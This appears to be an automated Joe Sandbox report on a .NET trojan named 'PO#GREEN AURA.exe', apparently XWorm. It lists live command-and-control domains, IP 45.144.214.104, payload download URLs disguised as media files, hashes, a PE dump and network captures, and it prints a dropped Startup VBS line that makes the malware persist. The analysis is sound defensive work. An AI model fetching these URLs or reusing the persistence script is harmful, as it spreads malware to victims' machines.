              win32.ydns.eu
              45.144.214.104
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://win32.ydns.eu/1/12/panel/uploads/Xlzsats.wavfalse
                • Avira URL Cloud: safe
                unknown
                smfcs3.ydns.eutrue
                • Avira URL Cloud: safe
                unknown
                kingsbkup1.ydns.eutrue
                • Avira URL Cloud: safe
                unknown
                bin12.ydns.eutrue
                • Avira URL Cloud: safe
                unknown
                smfcs1.ydns.eutrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/mgravell/protobuf-netiPO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpfalse
                  high
                  https://stackoverflow.com/q/14436606/23354PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://github.com/mgravell/protobuf-netJPO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpfalse
                      high
                      https://stackoverflow.com/q/11564914/23354;PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpfalse
                        high
                        https://stackoverflow.com/q/2152978/23354PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpfalse
                          high
                          http://win32.ydns.euPO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/mgravell/protobuf-netPO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              45.144.214.104
                              win32.ydns.euUkraine
                              47169HPC-MVM-ASHUfalse
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1630686
                              Start date and time:2025-03-06 07:05:19 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 28s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:19
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:PO#GREEN AURA.exe
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winEXE@4/3@1/1
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 96%
                              • Number of executed functions: 96
                              • Number of non-executed functions: 21
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 40.126.32.72, 13.107.253.72, 4.245.163.56, 20.223.35.26, 2.23.227.215
                              • Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target PO#GREEN AURA.exe, PID 6840 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              TimeTypeDescription
                              06:06:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              45.144.214.104pictures and specifications.exeGet hashmaliciousXWormBrowse
                              • win32.ydns.eu/never/lookinto/it/panel/uploads/Qwprueqkjqe.mp3
                              Bestellbest#U00e4tigung.exeGet hashmaliciousXWormBrowse
                              • win32.ydns.eu/never/lookinto/it/panel/uploads/Rieukcp.pdf
                              FFDOC-2025210 pdf.exeGet hashmaliciousXWormBrowse
                              • win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp3
                              UPS tracking details.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                              • win32.ydns.eu/never/lookinto/it/panel/uploads/Fjuzaw.pdf
                              Enquiry#039855.exeGet hashmaliciousXWormBrowse
                              • win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              win32.ydns.eupictures and specifications.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104
                              Bestellbest#U00e4tigung.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104
                              FFDOC-2025210 pdf.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104
                              UPS tracking details.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                              • 45.144.214.104
                              Enquiry#039855.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              HPC-MVM-ASHUpictures and specifications.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104
                              Bestellbest#U00e4tigung.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104
                              FFDOC-2025210 pdf.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104
                              nklarm.elfGet hashmaliciousUnknownBrowse
                              • 45.131.150.251
                              UPS tracking details.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                              • 45.144.214.104
                              1ZXaFij.exeGet hashmaliciousXmrigBrowse
                              • 45.144.212.77
                              Enquiry#039855.exeGet hashmaliciousXWormBrowse
                              • 45.144.214.104
                              Auftragsbest#U00e4tigung.exeGet hashmaliciousQuasarBrowse
                              • 45.144.214.107
                              IRSTaxRefund.exeGet hashmaliciousDBatLoader, RemcosBrowse
                              • 45.144.214.126
                              SCS AWB and Commercial Invoice.exeGet hashmaliciousSnake Keylogger, XWormBrowse
                              • 45.144.214.104
                              No context
                              No context
                              Process:C:\Users\user\Desktop\PO#GREEN AURA.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):105984
                              Entropy (8bit):6.053109192402332
                              Encrypted:false
                              SSDEEP:1536:EfDrLD7tmNEoCfjSbHb7RqWYZvZqF3c9MwsUSEJxY87d17:EHLD7Ewub70Wmy3VwQGxY87r7
                              MD5:71E0C8F71B15046709D4E250086346A4
                              SHA1:9536F9BC5E10128074CDD2597E970B29D44C4BCD
                              SHA-256:462E4F6C2647A8FFFB7BE6A37ECA3DFEF4051F9F20A5E8927B446D98D1AF84F0
                              SHA-512:15CD09125122F6E79BFFC9112EE888C4AFEF515D09A9598DA2B23CBC240B043E63F1D3D6538C74FC56CD65EEEB756679F1A4D54DD74E0A026BA80A7999DFF2BA
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 32%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d2.g............................N.... ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H...........................h............................................0..........(....*.*.0../.........(....}.......}......|......(...+..|....(....*..0...........(....o.......(....*.0...........{......&..,8.(....o.......(....-?..%.}......}.....|.......(...+.....{......|............%.}......(....(....(....(....(.... .a..(....(.... .k..(....(......&........}.....|.....(.........}.....|....(....*............................6.|.....(....*...0..7.........(....}.......}.......}
                              Process:C:\Users\user\Desktop\PO#GREEN AURA.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\PO#GREEN AURA.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):80
                              Entropy (8bit):4.700070520364181
                              Encrypted:false
                              SSDEEP:3:FER/n0eFHHot+kiEaKC5yjn:FER/lFHIwknaZ5s
                              MD5:B7B6811983F114787E6D28702308C6F2
                              SHA1:5BA48CB2DD40DB58FD9C48B2102B676A04F2C35E
                              SHA-256:971C112651121F94A06C1536F27F815FDC9A8E95973BFE1CEEBF8B16786FAD98
                              SHA-512:A50BACE60CCCD25F0DDA9F859FBFD2EC2F0CA1AE9AAE4A4F8BEC459664DEB278EBDE233D5A527FD268A2AEDC046DDC509E7B171F45ED97E2DEE186C4E5537FBF
                              Malicious:true
                              Reputation:low
                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Count.exe"""
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):6.053109192402332
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:PO#GREEN AURA.exe
                              File size:105'984 bytes
                              MD5:71e0c8f71b15046709d4e250086346a4
                              SHA1:9536f9bc5e10128074cdd2597e970b29d44c4bcd
                              SHA256:462e4f6c2647a8fffb7be6a37eca3dfef4051f9f20a5e8927b446d98d1af84f0
                              SHA512:15cd09125122f6e79bffc9112ee888c4afef515d09a9598da2b23cbc240b043e63f1d3d6538c74fc56cd65eeeb756679f1a4d54dd74e0a026ba80a7999dff2ba
                              SSDEEP:1536:EfDrLD7tmNEoCfjSbHb7RqWYZvZqF3c9MwsUSEJxY87d17:EHLD7Ewub70Wmy3VwQGxY87r7
                              TLSH:00A34C2477C9CEC1C35C14B8E997118167F9C2921703FB9BEE8668B42D03752AA7727E
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d2.g............................N.... ........@.. ....................................`................................
                              Icon Hash:90cececece8e8eb0
                              Entrypoint:0x41b24e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x67C93264 [Thu Mar 6 05:28:04 2025 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1b1f40x57.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x600.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e0000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x192540x194009eb204a6fd56059714b36f565115c2a5False0.4844040068069307data6.097329012718951IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0x1c0000x6000x600b8242d5aabfc3add3faf9975b8f35096False0.4205729166666667data4.184929006297323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x1e0000xc0x20035f7c8a473a42730fa9834961a7a4394False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0x1c0a00x33cdata0.4178743961352657
                              RT_MANIFEST0x1c3dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                              DLLImport
                              mscoree.dll_CorExeMain
                              DescriptionData
                              Translation0x0000 0x04b0
                              Comments
                              CompanyName
                              FileDescriptionPO#GREEN AURA
                              FileVersion1.0.0.0
                              InternalNamePO#GREEN AURA.exe
                              LegalCopyrightCopyright 2011
                              LegalTrademarks
                              OriginalFilenamePO#GREEN AURA.exe
                              ProductNamePO#GREEN AURA
                              ProductVersion1.0.0.0
                              Assembly Version1.0.0.0
                              TimestampSource PortDest PortSource IPDest IP
                              Mar 6, 2025 07:06:13.361738920 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:13.367985964 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:13.368112087 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:13.369082928 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:13.374133110 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195303917 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195379019 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195400000 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195417881 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195456982 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195492983 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195529938 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195564985 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195601940 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195640087 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.195687056 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.195687056 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.195687056 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.195687056 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.200681925 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.200850964 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.200887918 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.200922966 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.200997114 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.326556921 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.326606035 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.326699018 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.326807976 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.326842070 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.326877117 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.326911926 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.326930046 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.326950073 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.326982021 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.327047110 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.327047110 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.327047110 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.327594042 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.327646017 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.327687025 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.327725887 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.327783108 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.327783108 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.328177929 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.328231096 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.328269958 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.328331947 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.328377008 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.328387976 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.328387976 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.328444004 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.328850985 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.328887939 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.328922033 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.328957081 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.328994036 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.329054117 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.329054117 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.381964922 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.458024025 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458100080 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458138943 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458173990 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458210945 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458245993 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458278894 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.458278894 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.458283901 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458312035 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.458321095 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458355904 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458389997 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458404064 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.458441019 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.458909035 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.458970070 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459008932 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459043980 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459060907 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.459079981 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459093094 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.459115982 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459155083 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459204912 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.459517002 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459561110 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459569931 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459595919 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459604025 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.459614038 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459625959 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.459631920 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459650040 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.459656954 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.460480928 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.460506916 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.460525990 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.460541010 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.460544109 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.460555077 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.460561991 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.460577965 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.460596085 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.460608959 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.460629940 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.461368084 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.461385965 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.461410999 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.461421967 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.461427927 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.461463928 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.461464882 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.461481094 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.461497068 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.461503983 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.461535931 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.462354898 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.462371111 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.462385893 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.462430000 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.589526892 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589600086 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589637995 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589674950 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589730024 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589782953 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589782953 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.589782953 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.589818954 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589852095 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.589871883 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589906931 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589941978 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589957952 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.589977980 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.589988947 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.590013981 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590048075 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590082884 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590096951 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.590118885 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590128899 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.590153933 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590192080 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590226889 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590238094 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.590264082 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590275049 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.590303898 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590338945 CET804973345.144.214.104192.168.2.4
